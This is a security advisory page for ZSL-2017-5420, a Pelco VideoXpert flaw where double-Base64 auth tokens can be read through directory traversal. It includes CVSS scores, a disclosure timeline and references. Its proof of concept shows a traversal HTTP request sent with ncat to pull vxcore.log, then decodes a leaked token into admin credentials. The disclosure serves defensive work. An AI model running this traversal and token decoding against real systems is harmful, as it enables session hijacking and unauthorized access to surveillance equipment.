Gjoko KrsticZSL-2017-5420Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
5.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
6.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N
7.1 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
52.9%
Title: Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
Advisory ID: ZSL-2017-5420
Type: Local/Remote
Impact: Exposure of Sensitive Information, Security Bypass
Risk: (3/5)
Release Date: 10.07.2017
Summary
VideoXpert is a video management solution designed for scalability, fitting the needs surveillance operations of any size. VideoXpert Ultimate can also aggregate other VideoXpert systems, tying multiple video management systems into a single interface.
Description
The software transmits sensitive data using double Base64 encoding for the Cookie ‘auth_token’ in a communication channel that can be sniffed by unauthorized actors or arbitrarely be read from the vxcore log file directly using directory traversal attack resulting in authentication bypass / session hijacking.
Vendor
Schneider Electric SE - <https://www.pelco.com>
Affected Version
2.0.41
1.14.7
1.12.105
Tested On
Microsoft Windows 7 Professional SP1 (EN)
Vendor Status
[05.04.2017] Vulnerabilities discovered.
[28.04.2017] Vendor contacted.
[09.07.2017] No response from the vendor.
[10.07.2017] Public security advisory released.
[05.12.2017] Vendor releases version 2.1 to address this issue.
PoC
Credits
Vulnerability discovered by Gjoko Krstic - <[email protected]>
References
[1] <http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php>
[2] <https://www.exploit-db.com/exploits/42312/>
[3] <https://cxsecurity.com/issue/WLB-2017070079>
[4] <https://packetstormsecurity.com/files/143318>
[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/129664>
[5] <https://www.schneider-electric.com/b2b/en/support/cybersecurity/security-notifications.jsp>
[6] <https://www.schneider-electric.com/en/download/document/SEVD-2017-339-01/>
[7] SEVD-2017-339-01- Pelco VideoXpert Enterprise (.pdf)
[8] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9964>
[9] <https://ics-cert.us-cert.gov/advisories/ICSA-17-355-02>
[10] <https://www.securityfocus.com/bid/102338>
[11] <http://securityaffairs.co/wordpress/67108/hacking/pelco-videoxpert-flaws.html>
[12] <https://www.cybersecurity-help.cz/vdb/SB2017122204>
[13] <https://nvd.nist.gov/vuln/detail/CVE-2017-9964>
[14] <http://www.isssource.com/schneider-clears-pelco-vulnerabilities/>
[15] <http://www.securityweek.com/schneider-electric-patches-flaws-pelco-video-management-system>
[16] <https://www.auscert.org.au/bulletins/56446>
Changelog
[10.07.2017] - Initial release
[01.08.2017] - Added reference [2], [3] and [4]
[07.08.2017] - Added reference [5]
[05.12.2017] - Added vendor status
[13.12.2017] - Added reference [5], [6], [7] and [8]
[13.01.2018] - Added reference [9], [10], [11], [12], [13], [14], [15] and [16]
Contact
Zero Science Lab
Web: <http://www.zeroscience.mk>
e-mail: [email protected]
<html><body><p>Schneider Electric Pelco VideoXpert Missing Encryption Of Sensitive Information
Vendor: Schneider Electric SE
Product web page: https://www.pelco.com
Affected version: 2.0.41
1.14.7
1.12.105
Summary: VideoXpert is a video management solution designed for
scalability, fitting the needs surveillance operations of any size.
VideoXpert Ultimate can also aggregate other VideoXpert systems,
tying multiple video management systems into a single interface.
Desc: The software transmits sensitive data using double Base64 encoding
for the Cookie 'auth_token' in a communication channel that can be
sniffed by unauthorized actors or arbitrarely be read from the vxcore
log file directly using directory traversal attack resulting in
authentication bypass / session hijacking.
Ref: ZSL-2017-5419
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Jetty(9.2.6.v20141205)
MongoDB/3.2.10
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5420
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5420.php
05.04.2017
--
After a user logs in, the web server creates a Cookie: auth_token which has the following value:
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
Base64 decoding that becomes:
eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiJhZG1pbjEyMyIsImRvbWFpbiI6IkxPQ0FMIiwiZXhwaXJlcyI6MTQ5MTU1Njc5NzE1OCwiYWdlbnQiOiI0MGY2NDM4Ni1mZmMwLTQ1NDEtOWNjZC1hNTIyM2RiMmZjMDkiLCJjbGllbnRJcCI6IjEyNy4wLjAuMSJ9
Again decoding, gives us result:
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
PoC remote session takeover with directory traversal:
-----------------------------------------------------
bash-4.4$ cat pelco_live.txt
GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\core\vxcore.log HTTP/1.1
Host: 127.0.0.1
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: text/plain; charset=utf-8
Accept: */*
Referer: https://127.0.0.1/portal/
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
bash-4.4$ ncat -v -n 127.0.0.1 80 < pelco_live.txt > vxcore_log.txt
bash-4.4$ cat vxcore_log.txt
--snip--
INFO [2017-04-06 11:20:09.999] [HealthCheckMonitorPollingThread-0] org.mongodb.driver.connection: Closed connection [connectionId{localValue:400, serverValue:473}] to mongod0-rs1-dfde27ce-6a4f-413a-a7c2-6df855d462df:31001 because the pool has been closed.
INFO [2017-04-06 11:20:12.559] [dw-5099 - GET /portal/System.html?auth_token=ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/System.html
INFO [2017-04-06 11:20:12.567] [dw-5055 - GET /portal/Lilac.css] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/Lilac.css
INFO [2017-04-06 11:20:12.568] [dw-5098 - GET /portal/lilac/lilac.nocache.js] com.pelco.vms.webService.application.servlets.StaticContentServlet: Returning static content for URI /portal/lilac/lilac.nocache.js
--snip--
bash-4.4$ cat pelco_auth_token.txt
ZXlKMWMyVnlibUZ0WlNJNkltRmtiV2x1SWl3aWNHRnpjM2R2Y21RaU9pSmhaRzFwYmpFeU15SXNJbVJ2YldGcGJpSTZJa3hQUTBGTUlpd2laWGh3YVhKbGN5STZNVFE1TVRVMU5qYzVOekUxT0N3aVlXZGxiblFpT2lJME1HWTJORE00TmkxbVptTXdMVFExTkRFdE9XTmpaQzFoTlRJeU0yUmlNbVpqTURraUxDSmpiR2xsYm5SSmNDSTZJakV5Tnk0d0xqQXVNU0o5
bash-4.4$ base64 -D pelco_auth_token.txt |base64 -D -
{"username":"admin","password":"admin123","domain":"LOCAL","expires":1491556797158,"agent":"40f64386-ffc0-4541-9ccd-a5223db2fc09","clientIp":"127.0.0.1"}
bash-4.4$
</p></body></html>Related
5.8 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
6.9 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:N
7.1 High
AI Score
Confidence
High
0.002 Low
EPSS
Percentile
52.9%